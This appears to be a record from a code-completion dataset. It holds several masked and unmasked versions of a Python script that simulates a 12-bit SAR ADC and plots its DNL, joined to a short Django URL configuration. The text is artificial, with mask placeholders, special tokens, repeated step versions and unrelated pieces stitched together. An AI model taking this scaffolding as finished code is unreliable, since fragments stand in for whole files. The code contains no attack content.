- 0.5) * 2\n code[i + 7] = 1 if vin > 0 else 0\n dec_num = 0\n for b in code:\n dec_num = dec_num * 2 + b\n return dec_num\n\n\nprint(AtoD(0.5))\n\n\ndef DtoA_ideal(code):\n v = -1.0\n for i in range(12):\n v += 2 ** (11 - i) * code[i] / 2048\n return v\n\n\nprint(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]))\n<mask token>\nfor i in range(2 * n):\n if y[i + 1] != y[i]:\n bin_size[y[i]] = x[i + 1] - left\n left = x[i + 1]\n<mask token>\nplt.plot(bin_num[1:4094], DNL[1:4094])\nplt.show()\n", "step-3": "<mask token>\nCi_MSB = [32, 16, 8, 4, 2, 1]\nCi_LSB = [16, 8, 4, 2, 1]\nCB = 1\nCP_B = 0\nCP_LSB = (32 - 1) * (CB + CP_B - 1) + 10\nprint(CP_LSB)\nCP_MSB = 0\nCsum_LSB = sum(Ci_LSB) + CP_LSB\nCsum_MSB = sum(Ci_MSB) + CP_MSB\nCx = Csum_LSB * Csum_MSB + (CB + CP_B) * Csum_LSB + (CB + CP_B) * Csum_MSB\nWi_MSB = [(Ci_MSB[i] * (CB + CP_B + Csum_LSB) / Cx) for i in range(6)]\nWi_LSB = [(Ci_LSB[i] * (CB + CP_B) / Cx) for i in range(5)]\nprint(Wi_MSB)\nprint(Wi_LSB)\n\n\ndef AtoD(vin):\n code = [(0) for i in range(12)]\n code[0] = 1 if vin > 0 
else 0\n for i in range(6):\n vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2\n code[i + 1] = 1 if vin > 0 else 0\n for i in range(5):\n vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2\n code[i + 7] = 1 if vin > 0 else 0\n dec_num = 0\n for b in code:\n dec_num = dec_num * 2 + b\n return dec_num\n\n\nprint(AtoD(0.5))\n\n\ndef DtoA_ideal(code):\n v = -1.0\n for i in range(12):\n v += 2 ** (11 - i) * code[i] / 2048\n return v\n\n\nprint(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]))\nn = 1000000\nx = [(-1 + i / n) for i in range(2 * n + 1)]\ny = [AtoD(v) for v in x]\nbin_num = [i for i in range(4096)]\nbin_size = [(0) for i in range(4096)]\nleft = x[0]\nfor i in range(2 * n):\n if y[i + 1] != y[i]:\n bin_size[y[i]] = x[i + 1] - left\n left = x[i + 1]\nDNL = [(data * 2047 - 1) for data in bin_size]\nplt.plot(bin_num[1:4094], DNL[1:4094])\nplt.show()\n", "step-4": "import matplotlib.pyplot as plt\nCi_MSB = [32, 16, 8, 4, 2, 1]\nCi_LSB = [16, 8, 4, 2, 1]\nCB = 1\nCP_B = 0\nCP_LSB = (32 - 1) * (CB + CP_B - 1) + 10\nprint(CP_LSB)\nCP_MSB = 0\nCsum_LSB = sum(Ci_LSB) + CP_LSB\nCsum_MSB = sum(Ci_MSB) + CP_MSB\nCx = Csum_LSB * Csum_MSB + (CB + CP_B) * Csum_LSB + (CB + CP_B) * Csum_MSB\nWi_MSB = [(Ci_MSB[i] * (CB + CP_B + Csum_LSB) / Cx) for i in range(6)]\nWi_LSB = [(Ci_LSB[i] * (CB + CP_B) / Cx) for i in range(5)]\nprint(Wi_MSB)\nprint(Wi_LSB)\n\n\ndef AtoD(vin):\n code = [(0) for i in range(12)]\n code[0] = 1 if vin > 0 else 0\n for i in range(6):\n vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2\n code[i + 1] = 1 if vin > 0 else 0\n for i in range(5):\n vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2\n code[i + 7] = 1 if vin > 0 else 0\n dec_num = 0\n for b in code:\n dec_num = dec_num * 2 + b\n return dec_num\n\n\nprint(AtoD(0.5))\n\n\ndef DtoA_ideal(code):\n v = -1.0\n for i in range(12):\n v += 2 ** (11 - i) * code[i] / 2048\n return v\n\n\nprint(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]))\nn = 1000000\nx = [(-1 + i / n) for i in range(2 * n + 1)]\ny = [AtoD(v) for v 
in x]\nbin_num = [i for i in range(4096)]\nbin_size = [(0) for i in range(4096)]\nleft = x[0]\nfor i in range(2 * n):\n if y[i + 1] != y[i]:\n bin_size[y[i]] = x[i + 1] - left\n left = x[i + 1]\nDNL = [(data * 2047 - 1) for data in bin_size]\nplt.plot(bin_num[1:4094], DNL[1:4094])\nplt.show()\n", "step-5": "import matplotlib.pyplot as plt\n\nCi_MSB = [32,16,8,4,2,1]\nCi_LSB = [16,8,4,2,1]\nCB = 1\nCP_B = 0\nCP_LSB = (32-1)*(CB+CP_B-1)+10\nprint(CP_LSB)\nCP_MSB = 0\nCsum_LSB = sum(Ci_LSB)+CP_LSB\nCsum_MSB = sum(Ci_MSB)+CP_MSB\nCx = Csum_LSB*Csum_MSB+(CB+CP_B)*Csum_LSB+(CB+CP_B)*Csum_MSB\nWi_MSB = [Ci_MSB[i]*(CB+CP_B+Csum_LSB)/Cx for i in range (6)]\nWi_LSB = [Ci_LSB[i]*(CB+CP_B)/Cx for i in range (5)]\nprint(Wi_MSB)\nprint(Wi_LSB)\n\ndef AtoD(vin):\n code = [0 for i in range(12)]\n code[0] = 1 if vin > 0 else 0\n for i in range(6):\n vin = vin - Wi_MSB[i] * (code[i]-0.5)*2\n code[i+1] = 1 if vin > 0 else 0\n for i in range(5):\n vin = vin - Wi_LSB[i] * (code[i+6]-0.5)*2\n code[i + 7] = 1 if vin > 0 else 0\n dec_num = 0\n for b in code:\n dec_num = dec_num * 2 + b\n return dec_num\nprint(AtoD(0.50))\n\ndef DtoA_ideal(code):\n v = -1.0\n for i in range(12):\n v += 2**(11-i)*code[i]/2048\n return v\nprint(DtoA_ideal([1,1,1,1,1,1,1,1,1,1,1,1]))\n\n\nn=1000000\nx = [-1+i/n for i in range(2*n+1)]\ny = [AtoD(v) for v in x]\n# print(y[int(n/6):int(n/6)+100])\n\nbin_num = [i for i in range(4096)]\nbin_size = [0 for i in range(4096)]\n\nleft = x[0]\nfor i in range(2*n):\n if y[i+1]!=y[i]:\n bin_size[y[i]] = x[i+1] - left\n left = x[i+1]\n# print(bin_size)\nDNL = [data*2047 -1 for data in bin_size]\nplt.plot(bin_num[1:4094],DNL[1:4094])\n# plt.xlim(1000,1005)\n\nplt.show()\n\n\n\n\n\n# y = [DtoA_ideal(AtoD(v)) for v in x]\n# plt.plot(x,y)\n# plt.xlim(-0.01,0)\n# plt.ylim(-0.01,0)\n# plt.show()\n# def Vout(index):\n# V = 0.0\n# for i in range(6):\n# V = V + Wi_MSB[i] * int(format(index,'b').zfill(11)[i])*1\n# for i in range(5):\n# V = V + Wi_LSB[i] * 
int(format(index,'b').zfill(11)[i+6])*1\n# return V\n# print(Vout(2047))\n#\n# x = [i for i in range(2048)]\n# y = [Vout(i) for i in range(2048)]\n# DNL = [0]+[y[i+1]-y[i]-Vout(2047)/2047 for i in range(2047)]\n# DNL = [data*2048 for data in DNL]\n# INL = [y[i] -i*Vout(2047)/2047 for i in range (2048)]\n# INL = [data*2048 for data in INL]\n#\n# plt.plot(x,DNL)\n# plt.show()\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> app_name = 'bio' urlpatterns = [path('get_mtx_data', MainView.as_view())] <|reserved_special_token_1|> from django.urls import path from .views import MainView app_name = 'bio' urlpatterns = [path('get_mtx_data', MainView.as_view())] <|reserved_special_token_1|> from django.urls import path from .views import MainView app_name = "bio" # app_name will help us do a reverse look-up latter. urlpatterns = [ path('get_mtx_data', MainView.as_view()), ]
flexible
{ "blob_id": "e3a984294cad5830358df50fa00111017cbe226d", "index": 3678, "step-1": "<mask token>\n", "step-2": "<mask token>\napp_name = 'bio'\nurlpatterns = [path('get_mtx_data', MainView.as_view())]\n", "step-3": "from django.urls import path\nfrom .views import MainView\napp_name = 'bio'\nurlpatterns = [path('get_mtx_data', MainView.as_view())]\n", "step-4": "from django.urls import path\n\nfrom .views import MainView\n\napp_name = \"bio\"\n# app_name will help us do a reverse look-up latter.\nurlpatterns = [\n path('get_mtx_data', MainView.as_view()),\n]\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]